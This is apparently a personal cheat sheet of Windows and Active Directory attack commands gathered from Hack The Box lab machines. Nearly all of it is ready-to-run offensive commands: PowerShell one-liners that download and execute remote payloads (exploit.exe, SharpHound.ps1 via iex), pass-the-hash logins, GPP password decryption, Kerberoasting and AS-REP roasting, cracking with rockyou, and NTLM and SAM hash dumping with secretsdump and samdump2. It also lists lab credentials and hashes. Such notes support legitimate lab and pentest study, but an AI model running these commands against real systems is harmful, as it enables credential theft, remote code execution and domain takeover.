File transfer with powershell:

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')
iex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1")
***************************************************************************************************************************

Command to login with WinRM service:

evil-winrm -u administrator -p !R3m0te! -i 10.129.77.180

Command to login with hash:

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.129.95.188 cmd.exe

***************************************************************************************************************************

Active Directory Notes:

Following type of location can provide one of the file in which we can get the password hash of a user:

cd Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Group.xml

Sometime that hash can be cracked with ffollowing command:

gpp-decrypt <hash-value> 

Following command can be use to get the TGT of a user:

impacket-GetUserSPNs  active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.95.193 -request

Following command can be use to crack the obatined hash:

john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt

Following command can be use to logib with username and pasword

impacket-psexec active.htb/Administrator:Ticketmaster1968@active.htb
******************************************************************************************************************************

Following command can be use to get the hash of users ( AS-REP Roasting attack: Forest Machine )

Impacket-GetNPUsers htb.local/ -usersfile domain-users.txt -outputfile hashes-domain-users.txt -dc-ip 10.XX.XX.XX

We can crack the hash which we got from above command through john

john --wordlist=/usr/share/wordlists/rockyou.txt hashes-domain-users.txt

We can login with following command:

evil-winrm -i 10.129.139.144 -u svc-alfresco -p s3rvice

For Privillege escalation we can use a tool call Sharphound:

/usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1

transfer the above file in victim machine and run with following command:

invoke-bloodhound -collectionmethod all

Above command will generate a zip file, transfer it to your kali machine, if you are connected using evil-winrm you can run following command to download files:

download 20250201165854_BloodHound.zip

run neorj and bloodhound from terminal and upload the zip file.

Dump the NTLM hash with secretdump:

secretsdump.py svc-alfresco:s3rvice@10.10.10.161

Login withh obtained hash:

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/administrator@10.10.10.161
*************************************************************************************************************************
Dump Creds from SAM file from WIndows file syystem:

samdump2 ./SYSTEM ./SAM


